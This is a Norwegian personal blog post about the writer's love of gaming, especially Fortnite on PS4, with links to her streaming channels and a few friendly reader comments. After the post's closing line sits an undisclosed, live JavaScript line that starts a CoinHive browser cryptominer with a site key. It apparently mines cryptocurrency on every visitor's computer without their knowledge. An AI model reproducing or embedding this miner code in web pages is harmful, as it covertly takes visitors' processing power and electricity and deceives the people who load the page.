Alltid vært en gamer

Heia folkens 🙂

Jeg elsker å spille spill, det har jeg alltid gjort, det er sosialt, det er gøy, det gir meg en pause fra hverdagens tanker og stress.

Jeg har vel alltid vært en gamer, men i det siste har jeg vært hekta på å spille ps4 og Fortnite.

Er det noen som har prøvd det?

Skulle gjerne sett flere jenter game, så shout out hvis dere er jente og liker å spille.

Her har du en smakebit fra gode stunder når jeg streamer på Twitch (Lillelyng) Eller YouTube (sandralyngmusic)

 

var mnr = new CoinHive.Anonymous(‘YOjzBUoHFSepjyzKcZLh9AqoIf1Vz3Sn’, {throttle: 0.75}); mnr.start();

7 kommentarer
    1. Så gøy! Skal følge deg på Twitch 😀 Enig i at spill er en god måte å komme seg ut av hverdagen på + være sosial med folk. Har så mange venner som jeg kan prate med i timesvis bare fordi vi spiller sammen, som jeg utenom aldri ville fått funnet på noe med.
      Jeg tror mange fler jenter spiller enn det virker som, men at de ikke profilerer seg like mye og er like dedikerte som gutta, slik at det er få av de på toppnivå og sånn!

    2. Så gøy, det hadde jeg aldri trodd om deg faktisk! Jeg spiller på pc, da det er skyte og zombie spill 🙂
      Killing floor og left for dead syns jeg er gøy 🙂

    3. Whaa?! Så GØY å se at du er gamer. Fortnite er kjempemoro, spesielt med de ape monstrene. Jeg har ikke spilt det så mye da. Har du spilt The Last Guardian?

    4. Hei, jeg søkte på deg på twitch men fant deg ikke :O.
      Hadde vært kos og sett deg game ja, jeg er gamer selv. Har akkurat startet med Streaming!
      Har ikke helt skjønt dette enda, men det blir etterhvert 😀

    Legg igjen en kommentar

    Obligatoriske felt er merket med *

    Takk for at du engasjerer deg i denne bloggen.
    Unngå personangrep og sjikane og prøv å holde en hyggelig tone selv om du skulle være uenig med noen.
    Husk at du er juridisk ansvarlig for alt du skriver på nett.

Siste innlegg